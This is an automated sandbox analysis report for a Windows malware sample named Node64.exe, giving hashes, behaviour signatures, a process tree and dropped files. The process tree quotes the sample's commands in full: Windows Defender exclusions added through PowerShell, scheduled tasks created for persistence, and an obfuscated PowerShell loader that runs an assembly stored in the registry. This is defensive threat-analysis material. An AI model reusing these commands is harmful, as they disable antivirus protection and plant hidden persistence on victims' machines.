Analysis

  • max time kernel
    150s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-11-2024 17:33

General

  • Target

    tmpfile-main/Node64.exe

  • Size

    368KB

  • MD5

    47fe2649cc2325a477fce08731aeb716

  • SHA1

    268abf2cceac62263fe040dc40b8b4b9aa3592da

  • SHA256

    d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b

  • SHA512

    173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4

  • SSDEEP

    6144:dClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDN9gkHp683KX:dUolitMIaAFkh6

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{dfba5e1d-6538-4ca6-bb03-60e6f045a06d}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1688
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:596
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:1344
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                3⤵
                  PID:1492
                • C:\Windows\system32\wbem\wmiprvse.exe
                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  3⤵
                    PID:2332
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k RPCSS
                  2⤵
                    PID:672
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                    2⤵
                    • Modifies security service
                    PID:760
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                    2⤵
                      PID:816
                      • C:\Windows\system32\Dwm.exe
                        "C:\Windows\system32\Dwm.exe"
                        3⤵
                          PID:1120
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs
                        2⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:848
                        • C:\Windows\system32\wbem\WMIADAP.EXE
                          wmiadap.exe /F /T /R
                          3⤵
                          • Drops file in System32 directory
                          PID:2508
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {AB3124F7-8FEB-4D00-83F7-6C8C103F6F6A} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2712
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+'$'+'No'+[Char](100)+''+[Char](101)+''+'s'+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2348
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService
                        2⤵
                          PID:968
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkService
                          2⤵
                            PID:272
                          • C:\Windows\System32\spoolsv.exe
                            C:\Windows\System32\spoolsv.exe
                            2⤵
                              PID:1044
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1052
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                2⤵
                                  PID:1136
                                • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                  2⤵
                                    PID:2044
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                    2⤵
                                      PID:576
                                    • C:\Windows\system32\sppsvc.exe
                                      C:\Windows\system32\sppsvc.exe
                                      2⤵
                                        PID:2264
                                    • C:\Windows\system32\lsass.exe
                                      C:\Windows\system32\lsass.exe
                                      1⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:492
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:500
                                      • C:\Windows\Explorer.EXE
                                        C:\Windows\Explorer.EXE
                                        1⤵
                                          PID:1184
                                          • C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
                                            "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
                                            2⤵
                                            • Adds Run key to start application
                                            • Drops file in System32 directory
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:2636
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1580
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
                                              3⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2288
                                            • C:\Windows\System32\$Node32.exe
                                              "C:\Windows\System32\$Node32.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2860
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2800
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
                                              3⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2480
                                            • C:\Windows\System32\$Node2Json.exe
                                              "C:\Windows\System32\$Node2Json.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1268
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1608
                                            • C:\Windows\System32\schtasks.exe
                                              "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
                                              3⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:1792
                                            • C:\Windows\System32\$Node3Json.exe
                                              "C:\Windows\System32\$Node3Json.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1900
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "-436168471-1206241428-9196417204677608506989717191518734707-994009876-1861237981"
                                          1⤵
                                            PID:2340

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                            Filesize

                                            7KB

                                            MD5

                                            398e188aa00933fa6a4d11bfaa0dfb29

                                            SHA1

                                            6f8a8010a25fbb353900ea29b85aac3c53bba69b

                                            SHA256

                                            a55268b476ab76e1e0ced63519958d511fcd4f90b24ee805211b8807f7d7dd20

                                            SHA512

                                            83604b520f1d4ecf97deaabf083eae6c7907af66c2d1edededaaeb4feda9cb150774212e926c5856f56eb33d2a4db65ee6be960681fcc15c20c4e682d10073a0

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SS8D8ZPBN23OOLZBJKL2.temp

                                            Filesize

                                            7KB

                                            MD5

                                            d550a095b25add93e6c16a2394fb674a

                                            SHA1

                                            6ee8508d2a25a8c1de5bc3958e41003ba5f14c93

                                            SHA256

                                            93058c7487f12c83c78486218cf8219c1439c97f323a056eea7eec871006fcef

                                            SHA512

                                            d3cce7650f67c77b18d896290b8c1919f75d48b5b531ca857f8a61abcaa0cce50cdecb6afb4ebd3a15cf43287bc39c2782f3129abd68a2b7c45f834ddd8f5f88

                                          • C:\Windows\System32\$Node2Json.exe

                                            Filesize

                                            116KB

                                            MD5

                                            41814c2aa6f0aaffaaaa26ffd07b3550

                                            SHA1

                                            ea9731c42a382ed003b5b4bfd28c3ba437c8d14a

                                            SHA256

                                            da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e

                                            SHA512

                                            f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

                                          • C:\Windows\System32\$Node32.exe

                                            Filesize

                                            163KB

                                            MD5

                                            b850f016450d68da0ae4bb945355f70c

                                            SHA1

                                            521726c38af715e6ee1c76315151f0ed9518c6f4

                                            SHA256

                                            8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24

                                            SHA512

                                            30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

                                          • C:\Windows\System32\$Node3Json.exe

                                            Filesize

                                            117KB

                                            MD5

                                            391d4f99d0076ce566b370f1572ef670

                                            SHA1

                                            0bf04beb77440315098bacf30563a6542e254a45

                                            SHA256

                                            b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605

                                            SHA512

                                            1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

                                          • \??\PIPE\srvsvc

                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • memory/432-58-0x0000000000C20000-0x0000000000C45000-memory.dmp

                                            Filesize

                                            148KB

                                          • memory/432-61-0x0000000000C50000-0x0000000000C7A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/432-60-0x0000000000C20000-0x0000000000C45000-memory.dmp

                                            Filesize

                                            148KB

                                          • memory/1268-29-0x0000000000C20000-0x0000000000C42000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1580-9-0x00000000022C0000-0x00000000022C8000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1580-7-0x0000000002920000-0x00000000029A0000-memory.dmp

                                            Filesize

                                            512KB

                                          • memory/1580-8-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

                                            Filesize

                                            2.9MB

                                          • memory/1688-55-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1688-54-0x0000000077260000-0x000000007737F000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/1688-53-0x0000000077480000-0x0000000077629000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/1688-48-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1688-47-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1688-52-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1688-50-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1688-49-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1900-43-0x0000000000CA0000-0x0000000000CC2000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2348-44-0x0000000000F50000-0x0000000000F7A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/2348-45-0x0000000077480000-0x0000000077629000-memory.dmp

                                            Filesize

                                            1.7MB

                                          • memory/2348-46-0x0000000077260000-0x000000007737F000-memory.dmp

                                            Filesize

                                            1.1MB

                                          • memory/2636-42-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

                                            Filesize

                                            9.9MB

                                          • memory/2636-0-0x000007FEF5FA3000-0x000007FEF5FA4000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/2636-1-0x0000000000800000-0x0000000000862000-memory.dmp

                                            Filesize

                                            392KB

                                          • memory/2636-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp

                                            Filesize

                                            9.9MB

                                          • memory/2800-22-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/2800-21-0x000000001B7C0000-0x000000001BAA2000-memory.dmp

                                            Filesize

                                            2.9MB